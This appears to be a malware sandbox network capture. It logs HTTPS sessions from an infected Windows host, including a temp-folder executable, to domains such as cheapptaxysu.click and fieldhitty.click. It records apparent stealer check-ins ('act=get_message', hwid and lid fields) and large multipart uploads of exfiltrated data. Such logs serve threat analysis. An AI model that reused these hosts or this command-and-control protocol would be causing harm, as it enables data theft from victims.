2024-12-22 01:19:08 UTC	15331	OUT	Data Raw: 64 dc e7 6e cb f6 05 83 a8 c6 d0 50 17 56 51 e9 0e a0 e7 3f bb 5c 92 67 5a 28 08 d6 61 42 3b cf ce 5e c6 c8 86 bc 2a 16 39 06 c4 74 9e 32 56 ae 57 ce 02 2a bf 93 d7 1a 60 00 88 b6 c0 f2 d5 93 97 44 60 39 59 06 59 91 80 af 40 f0 10 d3 dd 53 a4 0c 4f 77 a6 b5 1f 66 b7 85 3c 37 da 9b b5 58 97 07 33 b5 c2 4d 86 52 2a 16 97 64 51 de 47 c5 d6 82 eb df 8f 85 ba ec be cc c7 0f 8b bd 1b 4f 78 7e a3 89 f2 93 bb ec ec be 44 26 e0 fc 50 11 96 1c ea 1d 67 64 1d 7c 77 d8 44 99 b0 31 5f 7f 0c c5 ad f5 48 bd 58 8d d3 3e 2d ba 42 28 f7 53 e1 b5 35 c3 29 61 c3 a9 99 4e 24 43 c8 59 43 41 71 f1 c3 17 dd 23 54 d6 44 c6 6c 81 d7 38 e6 a3 85 19 93 bd 14 1d 0d 35 90 3d a0 ef c5 c0 0d 0c 56 53 97 d2 52 07 23 00 74 64 90 24 70 5f f1 1f a9 9b 1f 17 bc 26 80 cd 18 a6 36 60 4d 2d 1b Data Ascii: dnPVQ?\gZ(aB;^9t2VW`D`9YY@SOwf<7X3MR*dQGOx~D&Pgd\|wD1_HX>-B(S5)aN$CYCAq#TDl85=VSR#td$p_&6`M-
2024-12-22 01:19:08 UTC	15331	OUT	Data Raw: da 25 7e 92 82 e3 c6 d2 3d 4d 3d 88 0f f3 66 d1 e9 f2 cc ed 39 a0 d9 c1 d1 2f f6 48 bb 9d d8 60 21 40 d2 dc 6b 64 d7 de 21 93 2a 82 7f 06 20 b5 98 22 2c cb a5 54 f3 16 cc 27 45 b3 6d 07 f8 01 86 66 66 9e 99 a6 51 3a f7 ed 22 6c e5 e9 1d f2 9f 64 a7 15 ff 54 b5 eb 1a 93 4e 63 27 d2 9e 5a 08 80 dc eb dd ef a5 37 8e b2 22 92 32 30 da e6 11 43 73 21 7c f3 1f 5e 4a b9 ea 22 bd 2c b6 52 ae 0e fd 96 a6 69 a9 17 69 28 ed eb bc f5 1b ca 22 79 9c ab ea b1 2b b2 4e b3 6e e5 97 a5 53 b0 e2 5a ff f3 23 75 bf 67 58 cd e7 94 1a d2 ef d5 9f 06 09 70 f1 e1 c8 a4 74 3a 42 cc be c8 aa eb e8 8d 1c 84 67 d5 d9 35 57 92 98 5e 59 ae 07 b2 58 b0 5b 8a 0a c9 1a f0 80 31 48 ce 36 95 17 11 3e fc 5c 0c ea 0c 2a d4 07 7a 26 87 87 e5 75 6e 9c 49 79 fc 89 7f 56 79 ac 37 36 66 be 65 46 Data Ascii: %~=M=f9/H`!@kd!* ",T'EmffQ:"ldTNc'Z7"20Cs!\|^J",Rii("y+NnSZ#ugXpt:Bg5W^YX[1H6>\*z&unIyVy76feF
2024-12-22 01:19:08 UTC	15331	OUT	Data Raw: 73 38 3f 6a a8 1e 4b de 13 f6 29 bd 58 5b 82 29 93 62 fc b4 1e b4 f4 1d fa 62 56 c4 8b 8b 99 d3 ad f5 60 c9 07 19 e4 7a de 81 73 5a ff 44 24 4d 4f 06 77 03 0e 28 8e f0 fc 65 33 82 1d 95 85 9a 46 78 cd 60 21 6e 00 e3 34 03 7d 03 2f 03 24 cc a3 81 21 30 e2 09 8b 80 7d f4 5b c1 11 ee d1 b7 c6 09 b9 eb ef d7 11 e3 a6 10 bb 62 26 7a 3a de ef b1 50 52 95 49 cb 54 ee 2f ea 08 0a 85 7d 71 38 9e 25 e4 6e a8 b7 8c 59 18 3d 11 7a 1d ed 56 5e f4 8b 2f 8b 78 a7 f7 5b 6f ad c3 1e 01 9c 75 73 a9 72 5c 11 4f db ff af dc ca 55 1b 32 3a fb a1 35 64 17 fd e1 9a 58 f3 f5 ec 4b 16 46 b6 3e a2 6c d7 7a 65 73 ed 44 d6 8f d3 1f 56 52 be d1 09 97 56 dc 3c 0e 2e 75 8a b2 4a fa ec b4 7c 06 04 f6 fb af cd ad c8 ff ee 09 cc b8 a4 91 f4 fa b5 16 f5 1d 35 f9 30 ee 72 67 7b b0 e4 06 05 Data Ascii: s8?jK)X[)bbV`zsZD$MOw(e3Fx`!n4}/$!0}[b&z:PRIT/}q8%nY=zV^/x[ousr\OU2:5dXKF>lzesDVRV<.uJ\|50rg{
2024-12-22 01:19:08 UTC	15331	OUT	Data Raw: 7c 01 ef 42 17 4f 04 3f 67 a7 f4 b0 32 d7 ce 32 eb a0 89 ac 62 95 01 2b 51 fa 27 f0 6e 16 ba 29 d4 be 5d 52 65 78 4a 70 5f a7 e7 d7 22 52 b8 b1 9c 48 54 d5 57 38 9d 78 22 8a c2 56 eb f8 21 33 d8 8d 4e ba 7f a7 78 8f 60 cf d6 b2 3c ee d1 18 97 b8 a7 4c 44 49 da 88 69 4f 7b 3e d0 bc 03 57 86 06 b1 8b 6b fb b6 0b 32 c3 5b 75 3f 13 5f fa 29 10 41 5a 1c ca 75 87 e5 12 d4 1f 73 87 12 0b aa 1c 44 3d 1f c7 f2 b8 ec a6 bc 66 b4 8a 66 ab 56 ec eb 75 be 1c c3 2b 98 c8 ab 58 dd e8 2d f9 55 64 49 1c 20 38 0a 82 59 44 9c 2a 19 0a 4f 9f 4f 0d 83 09 f1 a8 2e a9 6e c6 66 9e 77 ea fa d1 0a 23 4c f3 3a 0d cf 7b 40 eb 8b 13 c4 6c 5e 27 fc da 32 c0 49 99 5c 4b f9 37 0c f1 75 18 94 54 e9 5a ed 1f 22 80 9c 9e d0 69 b9 e8 b6 0a 7f 1b d2 e0 0f 6a 46 f7 f3 d5 c6 94 b9 da 86 c9 3b Data Ascii: \|BO?g22b+Q'n)]RexJp_"RHTW8x"V!3Nx`<LDIiO{>Wk2[u?_)AZusD=ffVu+X-UdI 8YD*OO.nfw#L:{@l^'2I\K7uTZ"ijF;
2024-12-22 01:19:08 UTC	15331	OUT	Data Raw: a9 9b d8 1f 2f a2 8f 20 c6 34 3a b6 b9 21 6b 8c c8 47 01 62 f9 f2 aa 45 5f aa 6c 08 72 35 5d c4 c6 96 0e 71 c5 41 e0 db 0a 07 ed 3c 65 e8 ce 7c 93 68 c2 fd 0f 88 5c 37 29 e0 8c b2 f9 45 0b 39 24 88 c7 80 2c 75 a6 de e8 58 1c 28 7d ce 70 02 59 b7 99 b4 90 b3 70 4b 66 5c 6d e7 0b 98 dc 4c a7 9a 43 81 97 99 f1 08 80 c1 3f 1a 9d 73 1a 12 a3 d5 1b ac 7f 60 96 2c 8c b5 36 dd d3 2c df cf dd 75 2e ea 3f 32 67 37 02 f3 e9 6f fb 73 01 44 6e f0 eb 33 e5 93 f9 27 9c 3c d4 7f f7 7a 55 dd 21 94 19 0c 39 be 9a 69 e4 bd 71 d6 b6 64 51 e6 52 fb be e2 2d a6 f1 06 cb 2e 79 8f 1c a9 86 62 6f fe 6a ac 2f cb f8 0d 5e 6e 51 34 cb 91 45 bd 62 e8 a5 8e 3c 40 82 8b 46 5d 9c a5 d6 53 c0 f2 f7 6a ed ee cb fe 83 34 8d 76 ad c7 b6 85 51 ff 50 ab 6b 0b ad 52 06 07 1e 5f 9e b2 fa 8c 8d Data Ascii: / 4:!kGbE_lr5]qA<e\|h\7)E9$,uX(}pYpKf\mLC?s`,6,u.?2g7osDn3'<zU!9iqdQR-.yboj/^nQ4Eb<@F]Sj4vQPkR_
2024-12-22 01:19:08 UTC	15331	OUT	Data Raw: a8 65 ba 42 bc 14 05 fb f2 f1 a1 d4 25 a5 63 e4 0c a8 1d 25 7f 48 81 8e 98 35 1b 61 8d 97 20 47 95 c9 78 d2 a9 65 2d ed 1d 24 fe fa eb 0f 61 8d 3d d3 2f 09 da 93 e1 73 ff 85 fc 36 09 67 62 0e a2 40 c9 16 6a b1 9b e4 43 6e 4f ae 0c c8 33 04 6d 4b 00 b2 88 ef f5 a7 dd 33 d5 1d 2e cb e7 28 37 06 cb 8c 03 51 a0 c5 7d 42 23 fd f5 12 d4 f3 20 a3 84 32 ed 9c 7b 8f 34 28 69 19 a8 2d db 34 70 bf 71 87 50 02 7e e5 09 cc 65 a8 a1 49 79 21 9d 25 dd 4a e4 e7 5e a6 c8 57 b3 ae 1e 0e a5 5b b6 50 83 1e 45 05 32 3f d5 85 bc ba b3 9c ed b7 f4 70 cf 28 e0 2f 7c 57 07 3b a9 9f 6f 9f 3f a6 b0 aa cf 60 20 29 29 ab d9 43 0f c2 83 43 a5 95 3f b6 ad e4 89 41 86 02 7c 43 65 1b 07 37 10 d1 ce 50 b9 16 3a 28 6d f7 da 6d ef bb 63 92 55 12 2b d3 59 37 74 82 2d 0b 76 45 c3 61 29 d2 ab Data Ascii: eB%c%H5a Gxe-$a=/s6gb@jCnO3mK3.(7Q}B# 2{4(i-4pqP~eIy!%J^W[PE2?p(/\|W;o?` ))CC?A\|Ce7P:(mmcU+Y7t-vEa)
2024-12-22 01:19:08 UTC	15331	OUT	Data Raw: 7b c9 31 37 2b a8 ac 35 23 d0 88 9d 1e 7f f2 8f db e6 4f f1 4b ca de 76 dc b3 37 3f 0c 9a 6f 3d ba 8b 62 ed 7d 46 56 02 5f c8 6e 63 d9 54 e4 6b 67 ac 1b 78 b2 20 95 9a da 37 1e e1 e6 f8 aa ef d7 87 2d 0f 7f 34 76 08 86 3f 7e 51 3a 0a ce 44 67 6d e1 2e 0b af 33 3a 82 79 ec 34 43 bf 84 83 4f da 4a c0 ab ea 2e 22 d2 49 32 b9 d5 c7 39 68 01 33 2d ee 4f 74 bb 34 25 c1 6f 9a ed f9 47 bd a3 78 b1 ca fc cc 4d ab 7a ee d1 49 57 e5 32 f2 b2 76 0c 09 d0 aa d7 22 96 41 53 8d 3a d8 f9 fd fd 86 c5 f0 4c fb 62 b8 74 f1 6d ce fe d1 4a 09 f1 2b 0e 1d fc 9b ba c1 2f 91 22 ac 1f b0 79 92 67 3e ca f4 c3 91 fc 44 9f 0b f8 65 4b 0b 45 4e df 0b 13 e1 95 59 1b 54 9b 9b ce d4 aa 6e 14 68 01 f9 20 d1 a7 9e e7 21 40 bb 50 b4 a2 e7 4b 4b a9 12 ed ac e8 b3 b6 f7 99 72 6b 4f d1 d5 32 Data Ascii: {17+5#OKv7?o=b}FV_ncTkgx 7-4v?~Q:Dgm.3:y4COJ."I29h3-Ot4%oGxMzIW2v"AS:LbtmJ+/"yg>DeKENYTnh !@PKKrkO2
2024-12-22 01:19:11 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b8d10pcav4oj5mvqdhkv3tvam0; expires=Wed, 16 Apr 2025 19:05:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5YY%2B5vZ7uOCdXbkVruFY%2FzfOsbWWqBV881rTxY5h1RbzH3SJfvVFO9TuMuvfXnrjMVN7S7RoA4wqlWwC36TOxcqKsE1vgNtpVZoPQVKjKE2kd5DHft3o7wcRssK2QKYGchU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c482e9f8e8c4b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1781&rtt_var=692&sent=170&recv=327&lost=0&retrans=0&sent_bytes=2838&recv_bytes=314016&delivery_rate=1554845&cwnd=232&unsent_bytes=0&cid=b3e2d05bc126161e&ts=3188&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	50286	104.21.67.146	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:08 UTC	368	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XT16VUTYUIO64 Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20410 Host: cheapptaxysu.click
2024-12-22 01:19:08 UTC	15331	OUT	Data Raw: 2d 2d 58 54 31 36 56 55 54 59 55 49 4f 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 58 54 31 36 56 55 54 59 55 49 4f 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 54 31 36 56 55 54 59 55 49 4f 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 58 54 31 36 56 55 54 59 Data Ascii: --XT16VUTYUIO64Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--XT16VUTYUIO64Content-Disposition: form-data; name="pid"3--XT16VUTYUIO64Content-Disposition: form-data; name="lid"CZJvss--geopoxid--XT16VUTY
2024-12-22 01:19:08 UTC	5079	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-22 01:19:09 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p62kehaae07ur3gn0kkequ0tsu; expires=Wed, 16 Apr 2025 19:05:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XmGNcDOLUV95VcSUvdagTbm19coWPqCfmR7UazXcsmKJ07RAVQ54iHrA2PqjOGBKZ%2BlhFlpMkyB1FvzmGOEPeuJ0W%2FDd6WTABSBaHNbGEBbmA3E0mNRG2uJt8jiOJhq27KcQe2s%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c48306bd29e16-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1948&rtt_var=752&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21458&delivery_rate=1435594&cwnd=189&unsent_bytes=0&cid=7b39b3395af40db7&ts=933&x=0"
2024-12-22 01:19:09 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:19:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	50287	104.21.21.99	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:08 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: discokeyus.lat
2024-12-22 01:19:08 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=F14195A540BC0B98AC8923850305D13E
2024-12-22 01:19:09 UTC	1123	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=c208mnt82m652p1or68p3v5pp0; expires=Wed, 16 Apr 2025 19:05:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KtEkqvRkzSuPOkm4zaWce0B8LQHl2qE2ZI7s3%2BUKkoVmeMkQyz%2FZPg2lKM5z5F8LzFw8wzpF58wzHSzeQ5Mi8POhrTeCrYkwTpzKpTSKJhnr8COZv56PiWoIGF1pRcPmPw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c483158a342e4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1696&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=980&delivery_rate=1664766&cwnd=228&unsent_bytes=0&cid=de4a572e83eb149f&ts=789&x=0"
2024-12-22 01:19:09 UTC	214	IN	Data Raw: 64 30 0d 0a 4c 4e 6f 6f 76 72 2f 6c 48 39 2b 42 51 5a 46 42 70 76 4c 2f 78 53 6d 57 46 6f 75 35 48 74 68 39 38 67 41 4e 36 47 4e 63 6a 6f 52 33 6f 51 72 4c 6e 64 38 39 74 2f 55 31 34 58 76 36 33 61 50 71 47 4b 34 6a 70 59 73 76 37 56 50 44 4d 54 37 47 55 6d 72 53 71 30 4f 38 54 75 4b 51 67 58 71 35 72 79 54 70 4a 49 54 65 33 61 4e 64 74 43 79 37 6c 54 79 39 58 38 67 77 63 4d 51 59 66 76 75 6d 46 76 68 41 79 73 75 56 4a 59 4f 75 48 62 35 77 6e 73 66 52 39 78 69 6a 4f 4c 71 49 4c 66 5a 4d 78 46 77 69 6d 78 63 35 37 2b 6c 77 39 56 72 66 30 59 46 77 73 71 38 6b 36 53 53 45 33 74 32 6a 58 62 51 73 75 35 55 38 76 56 2f 49 4d 48 43 31 0d 0a Data Ascii: d0LNoovr/lH9+BQZFBpvL/xSmWFou5Hth98gAN6GNcjoR3oQrLnd89t/U14Xv63aPqGK4jpYsv7VPDMT7GUmrSq0O8TuKQgXq5ryTpJITe3aNdtCy7lTy9X8gwcMQYfvumFvhAysuVJYOuHb5wnsfR9xijOLqILfZMxFwimxc57+lw9Vrf0YFwsq8k6SSE3t2jXbQsu5U8vV/IMHC1
2024-12-22 01:19:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	50292	104.21.67.146	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:10 UTC	369	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=H8MK476HFNQALN9 Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1414 Host: cheapptaxysu.click
2024-12-22 01:19:10 UTC	1414	OUT	Data Raw: 2d 2d 48 38 4d 4b 34 37 36 48 46 4e 51 41 4c 4e 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 38 4d 4b 34 37 36 48 46 4e 51 41 4c 4e 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 38 4d 4b 34 37 36 48 46 4e 51 41 4c 4e 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 67 65 6f 70 6f 78 69 64 0d 0a 2d 2d 48 38 Data Ascii: --H8MK476HFNQALN9Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--H8MK476HFNQALN9Content-Disposition: form-data; name="pid"1--H8MK476HFNQALN9Content-Disposition: form-data; name="lid"CZJvss--geopoxid--H8
2024-12-22 01:19:11 UTC	1128	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fnqkt533gih1050e2iacj58dni; expires=Wed, 16 Apr 2025 19:05:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vI9jfxAMccXs9k6Q9ofxZSVgu%2BBHRtUqZW5BH58be%2BkhZbFW3IjAFdBPSqAhdf9PtweB24WdeU7Fcpmv88K4gDR1ZNYvWoclpRp%2B0ixJzYgeRZCTHlpoP8MJv3B9lHbnPuNYxJE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c483eaf507ca6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1991&rtt_var=752&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2419&delivery_rate=1449851&cwnd=236&unsent_bytes=0&cid=7515f981afe7013c&ts=788&x=0"
2024-12-22 01:19:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:19:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	50298	104.21.89.115	443	7796	C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:13 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: fieldhitty.click
2024-12-22 01:19:13 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 76 62 41 72 5a 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PvbArZ--&j=&hwid=F14195A540BC0B98AC8923850305D13E
2024-12-22 01:19:14 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:19:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0an7f4ng5ugntbbmd76avsjtls; expires=Wed, 16 Apr 2025 19:05:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kl%2Bv5fka7bmmMTusRK5NHfizDTxQgGT2V%2FMP630JbvUhav%2BcyiCSJ2PExc0r3JmqmfB9R%2BC4SjtJddEtxMYzhKthFqhlK%2B85dgfViBZWmY175eNk5QUMY4taofaZnCy%2BVRAU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c484d9a521851-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1522&min_rtt=1517&rtt_var=579&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=977&delivery_rate=1871794&cwnd=214&unsent_bytes=0&cid=63798b8ea39d9148&ts=773&x=0"
2024-12-22 01:19:14 UTC	54	IN	Data Raw: 33 30 0d 0a 43 61 73 62 35 69 67 51 41 4e 78 52 49 4c 53 2b 65 4b 44 61 32 58 2f 58 55 39 57 75 4e 6d 4b 45 77 62 39 6f 69 45 58 78 37 59 56 53 39 67 3d 3d 0d 0a Data Ascii: 30Casb5igQANxRILS+eKDa2X/XU9WuNmKEwb9oiEXx7YVS9g==
2024-12-22 01:19:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	50299	104.21.67.146	443

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:19:13 UTC	375	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=HK8Q66R5AINP05L0AVY Cookie: __cf_mw_byp=IjjBQ74NQR3Cy3LPi8f7NG.yiYgwJYrvuAxBctfN9tI-1734830334-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 300502 Host: cheapptaxysu.click
2024-12-22 01:19:13 UTC	15331	OUT	Data Raw: 2d 2d 48 4b 38 51 36 36 52 35 41 49 4e 50 30 35 4c 30 41 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 4b 38 51 36 36 52 35 41 49 4e 50 30 35 4c 30 41 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 4b 38 51 36 36 52 35 41 49 4e 50 30 35 4c 30 41 56 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 